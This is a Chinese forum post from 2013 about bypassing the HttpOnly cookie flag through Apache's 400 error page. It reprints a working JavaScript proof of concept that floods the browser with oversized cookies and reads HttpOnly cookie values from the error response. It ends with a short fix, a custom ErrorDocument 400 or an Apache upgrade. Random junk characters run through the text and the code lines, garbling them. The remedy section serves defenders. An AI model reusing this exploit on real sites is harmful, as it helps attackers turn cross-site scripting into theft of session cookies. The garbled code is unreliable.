很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。/ v3 u1 P$ |& N0 Z
; ^' E0 F$ W, v @" f& {
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:3 \) i8 z$ Z8 ]2 d9 R! R/ F
7 L9 S7 f! l- r9 D! j
& I! i% D' b: t8 L
// http://www.exploit-db.com/exploits/18442/
& ^! I1 e* `# [4 {# f5 M( ffunction setCookies (good) {" S4 B) `, T% E: b
// Construct string for cookie value
: ]. W3 h4 |) F5 h7 rvar str = "";6 U# ?! X5 o4 T# S6 U! k, @
for (var i=0; i< 819; i++) { Q2 L& U/ `! w& Q- ^- ?) z
str += "x";+ _) Y1 o! Q1 N
}
' N5 w9 w3 i7 T" x2 w// Set cookies
' v5 u2 w% D$ v+ qfor (i = 0; i < 10; i++) {
" i& v* Y/ S- }' A, w5 b4 W// Expire evil cookie
' H9 ?. n9 U; a0 b6 x4 B/ S2 oif (good) {
. H1 D5 f; h9 I3 k$ A* `, Dvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
7 S, k6 Q g6 `: D" ?& t}
! K y* E' X5 N; S0 w; b& Q, H// Set evil cookie6 V: \" ~" e' h( X6 `1 H
else {8 }9 z7 P1 n- y# `4 D3 s" t
var cookie = "xss"+i+"="+str+";path=/";
9 C, j5 E A; m+ Y; ?}5 O3 t' U0 u2 ?( q9 [: _4 ^% m' {0 J. b/ B
document.cookie = cookie;# G( @/ T9 J' r+ R6 ~3 X. @
}6 {% J p d" j% Q8 S: l1 @# W( o
}: U6 t" ~" k* X6 a; b
function makeRequest() {8 y8 K0 q7 W( L) E
setCookies();* ], V0 r% f( e3 u7 Z3 Y! t
function parseCookies () {
8 a& d2 R1 m. L/ Wvar cookie_dict = {};
4 m, m3 q! J$ f4 ^! W5 D// Only react on 400 status
% [) a/ x9 ^6 `- e- @) yif (xhr.readyState === 4 && xhr.status === 400) {
" e+ ~. L1 K8 t+ E// Replace newlines and match <pre> content" e/ i- L5 I4 g/ W: V" a
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);/ N" t4 ^1 k! E9 F* h3 X
if (content.length) {; G/ |5 o( \- r7 Z- T5 D: }* \
// Remove Cookie: prefix
7 q4 K1 k: e. ~$ w7 ncontent = content[1].replace("Cookie: ", "");6 {1 i# w) H) f; g. {
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
( L& O. Z$ A8 N& G4 ]// Add cookies to object9 @0 W" |6 Z. l6 ^! _
for (var i=0; i<cookies.length; i++) {. r1 R9 N7 V- K1 R, @
var s_c = cookies.split('=',2);
: n+ i8 [7 P _' S0 Z# bcookie_dict[s_c[0]] = s_c[1];. b2 o, ]+ S1 X! M& W
}
& {7 W/ \. y, ^}
' O$ U* q+ `0 C% D8 i// Unset malicious cookies
# h# y+ a! J- j8 }4 Z" d OsetCookies(true);$ E* }8 g6 I6 g/ d
alert(JSON.stringify(cookie_dict));7 q( L2 K, I. H
}
}+ K4 p3 ?8 m2 c' E; S2 W}* }1 I! A% J$ \2 G$ x5 V4 R
// Make XHR request1 C8 c; h) F( e9 o, X! [. l$ i
var xhr = new XMLHttpRequest();* v# v; g2 }: v
xhr.onreadystatechange = parseCookies;
# F) ~6 q: Y- F Z; r' ]* v" pxhr.open("GET", "/", true);
/ A% @0 u" I7 N) u- nxhr.send(null);% P6 X1 l9 |: h$ C& h! }6 C
}& P# ]4 k5 ?$ M" V D% Q7 s( i
makeRequest();
' B9 l! b1 D; }6 d: s' o# r
9 K+ g3 C# i8 t! _% I" Q3 D4 C1 _你就能看见华丽丽的400错误包含着cookie信息。' b& L0 ~- ^) I- h* L$ `7 ` Y
7 G7 a% Y/ |* O2 T) u ~0 _下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
9 A( w( u c2 ^7 s6 }+ y4 b7 ~: J& j" x: L4 d3 A+ U# O
修复方案:- B- {4 \: x% `
% Q# R' ?' i5 W O9 h6 w
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下/ q9 V1 `: c# Y6 v" G1 o, F
' }8 @% L* `# l& Z! B! jIn the event of a problem or error, Apachecan be configured to do one of four things,
! \4 M; Z' } t8 Q- v% A! R# L5 k# z8 ~& E: L5 u, ?
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息: G, q: `0 @7 S* m: Z& }" X$ ?; n
2. output acustomized message输出一段信息
* c- {4 M/ f$ ?8 o, {% G3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 N% j2 q+ s' d: I& P
4. redirect to an external URL to handle theproblem/error转向一个外部URL
7 C: x' \( x+ I* _
5 w0 i3 j% w7 W, E$ K; Q经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
; O4 \# l/ f) K4 q( H" r/ }3 e/ s& W U4 _+ p( x5 M
Apache配置:
( Z$ j2 D4 V# H2 o3 A
* W ]# Q( e8 N2 aErrorDocument400 " security test"
. b' W( x. ?! `
5 v# P: `' C$ F1 c当然,升级apache到最新也可:)。; G9 k' w. C z) X" {, H& m
, B1 P# |# [/ F/ B0 R% n参考:http://httpd.apache.org/security/vulnerabilities_22.html: k) @% ?- M2 u6 }: @
0 o- f. Z q$ S2 d2 P' p' C) o |
发表于 2013-4-19 19:15:43
收藏
支持
反对